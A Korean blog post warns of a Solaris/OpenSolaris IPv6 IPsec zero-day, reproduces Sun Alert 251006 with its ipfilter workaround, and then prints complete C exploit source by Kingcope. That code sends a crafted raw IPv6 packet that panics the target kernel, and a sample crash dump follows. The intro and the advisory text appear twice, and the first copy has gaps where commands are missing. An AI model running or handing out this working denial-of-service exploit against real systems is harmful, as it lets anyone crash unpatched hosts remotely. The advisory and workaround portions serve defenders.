솔라리스 시스템에 대한 IPv6 ipsec 관련 제로데이 공격 코드가 공개 되었습니다.
현재 sun 에서 공식적인 패치가 나오지 않은 상태 입니다.
아래에 해당 하는 버전들이 취약하니 각별히 유의하시기 바랍니다.
Sun SunOS 5.11
Sun Solaris 11
Sun Solaris 10.0_x86
Sun Solaris 10
Sun OpenSolaris build snv_99
Sun OpenSolaris build snv_96
Sun OpenSolaris build snv_95
Sun OpenSolaris build snv_92
Sun OpenSolaris build snv_91
Sun OpenSolaris build snv_90
Sun OpenSolaris build snv_89
Sun OpenSolaris build snv_88
Sun OpenSolaris build snv_87
Sun OpenSolaris build snv_86
Sun OpenSolaris build snv_85
Sun OpenSolaris build snv_84
Sun OpenSolaris build snv_83
Sun OpenSolaris build snv_82
Sun OpenSolaris build snv_80
Sun OpenSolaris build snv_78
Sun OpenSolaris build snv_77
Sun OpenSolaris build snv_76
Sun OpenSolaris build snv_68
Sun OpenSolaris build snv_67
Sun OpenSolaris build snv_64
Sun OpenSolaris build snv_61
Sun OpenSolaris build snv_59
Sun OpenSolaris build snv_57
Sun OpenSolaris build snv_50
Sun OpenSolaris build snv_39
Sun OpenSolaris build snv_36
Sun OpenSolaris build snv_29
Sun OpenSolaris build snv_22
Sun OpenSolaris build snv_19
Sun OpenSolaris build snv_13
Sun OpenSolaris build snv_107
Sun OpenSolaris build snv_106
Sun OpenSolaris build snv_105
Sun OpenSolaris build snv_104
Sun OpenSolaris build snv_104
Sun OpenSolaris build snv_103
Sun OpenSolaris build snv_102
Sun OpenSolaris build snv_101
Sun OpenSolaris build snv_100
Sun OpenSolaris build snv_02
Sun OpenSolaris build snv_01
해당 버전들은 원격에서 서비스 거부 공격을 당할 수 있는 위협에 노출되어 있습니다.
대안은 해당 버전들의 업그레이드 버전을 사용해야 합니다.
하단의 내용을 참고하시기 바랍니다.
http://sunsolve.sun.com/search/document.do?assetkey=1-66-251006-1
위 링크의 내용 전문은 아래와 같습니다.
Solution Type Sun Alert
Solution 251006 : A Security Vulnerability in Solaris IPv6 Implementation (ip6(7p)) May Cause a System Panic
Bug ID
Product
Date of Workaround Release
SA Document Body
1. Impact
An insufficient validation security vulnerability in the Solaris IPv6 implementation (ip6(7p)) may allow a remote privileged user to panic the system using a crafted packet. This is a type of Denial of Service (DoS).
2. Contributing Factors
This issue can occur in the following releases:
SPARC Platform:
1. Solaris 8 and Solaris 9 are not affected by this issue.
2. This issue only affects systems which have at least one IPv6 interface configured and "up".
The ifconfig(1M) command can be used to list all IPv6 interfaces configured and "up" on the system as follows:
3. OpenSolaris distributions may include additional bug fixes above and beyond the base build from which it was derived. The base build can be derived as follows:
If the described issue occurs, the following panic string and stack trace may be seen:
Malformed packets can be blocked to prevent this issue from occurring using Solaris IP Filter (ipfilter(5)) with the following rule:
Please refer to ipf(1M) and ipf(4) for enabling and configuring ipfilter.
If an IPv6 interface is configured but not being used, then disabling the IPv6 interface will also prevent this issue from occurring on the system.
To disable all IPv6 interfaces on a system, following command can be run as root:
SPARC Platform
5. Resolution
This issue is addressed in the following releases:
SPARC Platform
For more information on Security Sun Alerts, see Technical Instruction ID 213557.
This Sun Alert notification is being provided to you on an "AS IS" basis. This Sun Alert notification may contain information provided by third parties. The issues described in this Sun Alert notification may or may not impact your system(s). Sun makes no representations, warranties, or guarantees as to the information contained herein. ANY AND ALL WARRANTIES, EXPRESS OR IMPLIED, INCLUDING WITHOUT LIMITATION WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, OR NON-INFRINGEMENT, ARE HEREBY DISCLAIMED. BY ACCESSING THIS DOCUMENT YOU ACKNOWLEDGE THAT SUN SHALL IN NO EVENT BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, PUNITIVE, OR CONSEQUENTIAL DAMAGES THAT ARISE OUT OF YOUR USE OR FAILURE TO USE THE INFORMATION CONTAINED HEREIN. This Sun Alert notification contains Sun proprietary and confidential information. It is being provided to you pursuant to the provisions of your agreement to purchase services from Sun, or, if you do not have such an agreement, the Sun.com Terms of Use. This Sun Alert notification may only be used for the purposes contemplated by these agreements.
Copyright 2000-2009 Sun Microsystems, Inc., 4150 Network Circle, Santa Clara, CA 95054 U.S.A. All rights reserved.
Attachments
또한 공격 코드는 아래와 같습니다.
현재 sun 에서 공식적인 패치가 나오지 않은 상태 입니다.
아래에 해당 하는 버전들이 취약하니 각별히 유의하시기 바랍니다.
Sun SunOS 5.11
Sun Solaris 11
Sun Solaris 10.0_x86
Sun Solaris 10
Sun OpenSolaris build snv_99
Sun OpenSolaris build snv_96
Sun OpenSolaris build snv_95
Sun OpenSolaris build snv_92
Sun OpenSolaris build snv_91
Sun OpenSolaris build snv_90
Sun OpenSolaris build snv_89
Sun OpenSolaris build snv_88
Sun OpenSolaris build snv_87
Sun OpenSolaris build snv_86
Sun OpenSolaris build snv_85
Sun OpenSolaris build snv_84
Sun OpenSolaris build snv_83
Sun OpenSolaris build snv_82
Sun OpenSolaris build snv_80
Sun OpenSolaris build snv_78
Sun OpenSolaris build snv_77
Sun OpenSolaris build snv_76
Sun OpenSolaris build snv_68
Sun OpenSolaris build snv_67
Sun OpenSolaris build snv_64
Sun OpenSolaris build snv_61
Sun OpenSolaris build snv_59
Sun OpenSolaris build snv_57
Sun OpenSolaris build snv_50
Sun OpenSolaris build snv_39
Sun OpenSolaris build snv_36
Sun OpenSolaris build snv_29
Sun OpenSolaris build snv_22
Sun OpenSolaris build snv_19
Sun OpenSolaris build snv_13
Sun OpenSolaris build snv_107
Sun OpenSolaris build snv_106
Sun OpenSolaris build snv_105
Sun OpenSolaris build snv_104
Sun OpenSolaris build snv_104
Sun OpenSolaris build snv_103
Sun OpenSolaris build snv_102
Sun OpenSolaris build snv_101
Sun OpenSolaris build snv_100
Sun OpenSolaris build snv_02
Sun OpenSolaris build snv_01
해당 버전들은 원격에서 서비스 거부 공격을 당할 수 있는 위협에 노출되어 있습니다.
대안은 해당 버전들의 업그레이드 버전을 사용해야 합니다.
하단의 내용을 참고하시기 바랍니다.
http://sunsolve.sun.com/search/document.do?assetkey=1-66-251006-1
위 링크의 내용 전문은 아래와 같습니다.
Document Audience: | PUBLIC | |
Document ID: | 251006 | |
Title: | A Security Vulnerability in Solaris IPv6 Implementation (ip6(7p)) May Cause a System Panic | |
Copyright Notice: | Copyright © 2009 Sun Microsystems, Inc. All Rights Reserved | |
Update Date: | Tue Jan 27 00:00:00 MST 2009 |
Solution Type Sun Alert
Solution 251006 : A Security Vulnerability in Solaris IPv6 Implementation (ip6(7p)) May Cause a System Panic
Related Categories |
|
Bug ID
6797796
Product
Solaris 10 Operating System
OpenSolaris
Date of Workaround Release
27-Jan-2009
SA Document Body
A Security Vulnerability in Solaris IPv6 Implementation (ip6(7p)) May Cause a System Panic
1. Impact
An insufficient validation security vulnerability in the Solaris IPv6 implementation (ip6(7p)) may allow a remote privileged user to panic the system using a crafted packet. This is a type of Denial of Service (DoS).
2. Contributing Factors
This issue can occur in the following releases:
SPARC Platform:
- Solaris 10
- OpenSolaris based upon builds snv_01 through snv_107
- Solaris 10
- OpenSolaris based upon builds snv_01 through snv_107
1. Solaris 8 and Solaris 9 are not affected by this issue.
2. This issue only affects systems which have at least one IPv6 interface configured and "up".
The ifconfig(1M) command can be used to list all IPv6 interfaces configured and "up" on the system as follows:
$ ifconfig -au6Solaris 10 does not have a default IPv6 interface configured since administrators are required to enable or disable IPv6 at install time.
3. OpenSolaris distributions may include additional bug fixes above and beyond the base build from which it was derived. The base build can be derived as follows:
$ uname -v3. Symptoms
snv_86
If the described issue occurs, the following panic string and stack trace may be seen:
4. Workaroundipsec_needs_processing_v6ipsec_needs_processing_v6 ()
ipsec_early_ah_v6 ()
ip_rput_data_v6 ()
ip_rput_v6 ()
putnext ()
dld_str_rx_fastpath ()
i_dls_link_rx ()
...
Malformed packets can be blocked to prevent this issue from occurring using Solaris IP Filter (ipfilter(5)) with the following rule:
block in quick all with short
Please refer to ipf(1M) and ipf(4) for enabling and configuring ipfilter.
If an IPv6 interface is configured but not being used, then disabling the IPv6 interface will also prevent this issue from occurring on the system.
To disable all IPv6 interfaces on a system, following command can be run as root:
# ifconfig -a6 downThe following Interim Security Relief (ISRs) are available from http://www.sunsolve.sun.com/tpatches
SPARC Platform
- Solaris 10 IDR140811-01
- Solaris 10 IDR140812-01
5. Resolution
This issue is addressed in the following releases:
SPARC Platform
- OpenSolaris based upon builds snv_108 or later
- OpenSolaris based upon builds snv_108 or later
For more information on Security Sun Alerts, see Technical Instruction ID 213557.
This Sun Alert notification is being provided to you on an "AS IS" basis. This Sun Alert notification may contain information provided by third parties. The issues described in this Sun Alert notification may or may not impact your system(s). Sun makes no representations, warranties, or guarantees as to the information contained herein. ANY AND ALL WARRANTIES, EXPRESS OR IMPLIED, INCLUDING WITHOUT LIMITATION WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, OR NON-INFRINGEMENT, ARE HEREBY DISCLAIMED. BY ACCESSING THIS DOCUMENT YOU ACKNOWLEDGE THAT SUN SHALL IN NO EVENT BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, PUNITIVE, OR CONSEQUENTIAL DAMAGES THAT ARISE OUT OF YOUR USE OR FAILURE TO USE THE INFORMATION CONTAINED HEREIN. This Sun Alert notification contains Sun proprietary and confidential information. It is being provided to you pursuant to the provisions of your agreement to purchase services from Sun, or, if you do not have such an agreement, the Sun.com Terms of Use. This Sun Alert notification may only be used for the purposes contemplated by these agreements.
Copyright 2000-2009 Sun Microsystems, Inc., 4150 Network Circle, Santa Clara, CA 95054 U.S.A. All rights reserved.
Attachments
This solution has no attachment
또한 공격 코드는 아래와 같습니다.
/*
SunOS Release 5.11 Version snv_101b Remote IPV6
Kernel Crash Exploit 0day
By Kingcope/2009
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>
unsigned char rawData[] =
"\x60\xfc\x57\x29\x00\x00\x3c\x56\x6f\x35\x40\x72\x70\x2f\x52\x58"
"\xcc\x95\x12\x79\x30\xbb\xbe\x25\xfe\x80\x00\x00\x00\x00\x00\x00"
"\x02\x0c\x29\xff\xfe\xf1\x1e\xbb";
int main(int argc, char *argv[])
{
struct sockaddr_in6 dst;
int s;
if (argc < 2)
{
printf("SunOS Release 5.11 Version snv_101b Remote IPV6 Kernel Crash Exploit 0day By Kingcope/2009\n");
printf("Usage: %s <dst>\n", *argv);
return(1);
}
memset(&dst, 0, sizeof(dst));
if (inet_pton(AF_INET6, (char *)argv[1], (struct in6_addr *) &dst.sin6_addr) != 1) {
printf("Error: inet_pton()\n");
exit(-1);
}
memcpy(rawData+24, &dst.sin6_addr, 16);
dst.sin6_family = AF_INET6;
s = socket(AF_INET6, SOCK_RAW, IPPROTO_RAW);
if (s == -1)
return(1);
printf("Sending IPV6 packet: %s\n", argv[1]);
if (sendto(s,&rawData,sizeof(rawData),0,(struct sockaddr*)&dst,sizeof(dst)) == -1)
{
perror("Error sending packet");
exit(-1);
}
return(0);
}
/*
Kernel Crash Dump May Look Like The Following Snippet
[ID 965332 kern.notice] ipsec_needs_processing_v6
[ID 100000 kern.notice]
[ID 655072 kern.notice] ffffff00012b9650 ip:ipsec_needs_processing_v6+10c ()
[ID 655072 kern.notice] ffffff00012b96f0 ip:ipsec_early_ah_v6+75 ()
[ID 655072 kern.notice] ffffff00012b9860 ip:ip_rput_data_v6+f4e ()
[ID 655072 kern.notice] ffffff00012b9940 ip:ip_rput_v6+64e ()
[ID 655072 kern.notice] ffffff00012b99b0 unix:putnext+21e ()
[ID 655072 kern.notice] ffffff00012b9a00 dld:dld_str_rx_fastpath+8a ()
[ID 655072 kern.notice] ffffff00012b9ad0 dls:i_dls_link_rx+2c7 ()
[ID 655072 kern.notice] ffffff00012b9b50 mac:mac_do_rx+b7 ()
[ID 655072 kern.notice] ffffff00012b9b80 mac:mac_rx+1f ()
[ID 655072 kern.notice] ffffff00012b9bd0 e1000g:e1000g_intr+135 ()
[ID 655072 kern.notice] ffffff00012b9c20 unix:av_dispatch_autovect+7c ()
[ID 655072 kern.notice] ffffff00012b9c60 unix:dispatch_hardint+33 ()
[ID 655072 kern.notice] ffffff00012c5870 unix:switch_sp_and_call+13 ()
[ID 655072 kern.notice] ffffff00012c58c0 unix:do_interrupt+9e ()
[ID 655072 kern.notice] ffffff00012c58d0 unix:cmnint+ba ()
[ID 655072 kern.notice] ffffff00012c5a00 unix:ddi_mem_putb+f ()
[ID 655072 kern.notice] ffffff00012c5a40 ata:ata_disk_start_dma_out+88 ()
[ID 655072 kern.notice] ffffff00012c5a90 ata:ata_ctlr_fsm+1fb ()
[ID 655072 kern.notice] ffffff00012c5af0 ata:ata_hba_start+84 ()
[ID 655072 kern.notice] ffffff00012c5b30 ata:ghd_waitq_process_and_mutex_hold+df ()
[ID 655072 kern.notice] ffffff00012c5ba0 ata:ghd_intr+8d ()
[ID 655072 kern.notice] ffffff00012c5bd0 ata:ata_intr+27 ()
[ID 655072 kern.notice] ffffff00012c5c20 unix:av_dispatch_autovect+7c ()
[ID 655072 kern.notice] ffffff00012c5c60 unix:dispatch_hardint+33 ()
[ID 655072 kern.notice] ffffff0001205ab0 unix:switch_sp_and_call+13 ()
[ID 655072 kern.notice] ffffff0001205b00 unix:do_interrupt+9e ()
[ID 655072 kern.notice] ffffff0001205b10 unix:cmnint+ba ()
[ID 655072 kern.notice] ffffff0001205c00 unix:mach_cpu_idle+b ()
[ID 655072 kern.notice] ffffff0001205c40 unix:cpu_idle+17b ()
[ID 655072 kern.notice] ffffff0001205c60 unix:idle+4c ()
[ID 655072 kern.notice] ffffff0001205c70 unix:thread_start+8 ()
[ID 100000 kern.notice]
[ID 672855 kern.notice] syncing file systems...
[ID 904073 kern.notice] done
[ID 111219 kern.notice] dumping to /dev/zvol/dsk/rpool/dump, offset 65536, content: kernel
[ID 409368 kern.notice] ^M100% done: 56726 pages dumped, compression ratio 3.59,
[ID 851671 kern.notice] dump succeeded
[ID 540533 kern.notice] ^MSunOS Release 5.11 Version snv_101b 64-bit
[ID 172908 kern.notice] Copyright 1983-2008 Sun Microsystems, Inc. All rights reserved.
*/
'OS & network > solaris' 카테고리의 다른 글
솔라리스 네트워크 성능 분석도구 nicstat (0) | 2009.07.19 |
---|---|
솔라리스용 파이어폭스 3.0.7 릴리즈 (0) | 2009.03.07 |
솔라리스의 모니터링 관찰 도구 (1) | 2009.01.29 |
솔라리스 10 x86의 I/O 성능 관리 (0) | 2009.01.27 |
vmstat 명령어 (0) | 2009.01.27 |